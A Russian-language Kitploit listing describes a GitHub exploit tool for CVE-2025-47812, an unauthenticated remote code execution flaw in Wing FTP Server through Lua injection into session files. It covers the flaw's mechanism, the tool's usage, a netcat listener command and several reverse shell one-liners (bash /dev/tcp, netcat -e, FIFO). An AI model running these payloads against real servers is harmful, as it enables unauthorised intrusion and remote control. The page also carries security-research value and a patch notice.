Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-47812 — Эксплойт неаутентифицированного удаленного выполнения кода для Wing FTP Server < 7.4.4, обеспечивающий выполнение команд и обратные оболочки через Lua-инъекцию в файлах сеансов. | Kitploit
Инструменты/GitHubGitHub/blindma1den/cve-2025-47812
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и ОбразованиеRed TeamingИнструмент Удаленного Доступа
GitHubblindma1den/cve-2025-47812

CVE-2025-47812

Эксплойт неаутентифицированного удаленного выполнения кода для Wing FTP Server < 7.4.4, обеспечивающий выполнение команд и обратные оболочки через Lua-инъекцию в файлах сеансов.

131 год назадЕщё не проверено
Репозиторий

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2025-47812 - Удаленное выполнение кода (RCE) в Wing FTP Server

===========================================================

Автор: blindma1den

Дата: июль 2025

Тип эксплойта: Удаленное выполнение кода (без аутентификации)

Цель: Wing FTP Server < 7.4.4

Оценка CVSS: 10.0 (критическая)


ОПИСАНИЕ

Этот скрипт эксплуатирует CVE-2025-47812 — критическую уязвимость в веб-интерфейсе Wing FTP Server, которая позволяет удаленным злоумышленникам выполнять произвольные системные команды или открывать reverse shell без аутентификации.

Недостаток вызван некорректной обработкой нулевых байтов (%00) в форме входа (/loginok.html). Это позволяет внедрить Lua-код в файлы сессий, которые позже выполняются при обращении к таким конечным точкам, как /dir.html.


ИСТОЧНИКИ

Описание NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-47812


ВОЗМОЖНОСТИ

  • Выполнение команд (например, whoami, uname -a)
  • Несколько payload-ов для reverse shell
  • Автоматическое извлечение cookie сессии UID
  • Чистая модульная реализация на Python 3

  • ТРЕБОВАНИЯ

    • Python 3.7+
    • Модуль requests

    Установка зависимостей:

    root@kitploit:~
    pip install requests
    

    ИСПОЛЬЗОВАНИЕ

    Запустите скрипт:

    root@kitploit:~
    python3 wingftp_rce_exploit.py
    

    Вас попросят указать:

    • Целевой URL (например, http://127.0.0.1:5466)
    • Имя пользователя (по умолчанию: anonymous)
    • Режим эксплойта: [1] Выполнить команду [2] Запустить reverse shell

    ПРИМЕРЫ

    [1] ВЫПОЛНЕНИЕ КОМАНДЫ:

    root@kitploit:~
    Target URL: http://192.168.1.10:5466
    Username: anonymous
    Your choice (1 or 2): 1
    Command to execute (default: whoami): whoami
    

    [2] REVERSE SHELL:

    root@kitploit:~
    Target URL: http://192.168.1.10:5466
    Username: anonymous
    Your choice (1 or 2): 2
    Reverse shell IP address: 192.168.1.100
    Reverse shell port: 4444
    

    Запустите свой listener перед активацией shell:

    root@kitploit:~
    nc -lvnp 4444
    

    ИСПОЛЬЗУЕМЫЕ PAYLOAD-Ы (REVERSE SHELL)

    Bash: bash -i >& /dev/tcp/IP/PORT 0>&1

    Python3: python3 -c 'import socket,subprocess,os; ...'

    Netcat: nc IP PORT -e /bin/sh

    PHP: php -r '$sock=fsockopen("IP",PORT); ...'

    FIFO + Netcat: rm /tmp/f; mkfifo /tmp/f; cat /tmp/f|/bin/sh -i ...


    ОТКАЗ ОТ ОТВЕТСТВЕННОСТИ

    Этот код предназначен только для образовательных целей. НЕ используйте данный эксплойт против систем, которыми вы не владеете или на тестирование которых у вас нет явного разрешения. Несанкционированное использование незаконно и неэтично.

    Немедленно обновите свои системы. Wing FTP Server 7.4.4 устраняет данную уязвимость.

    Удачного хакинга!

    Скачать инструмент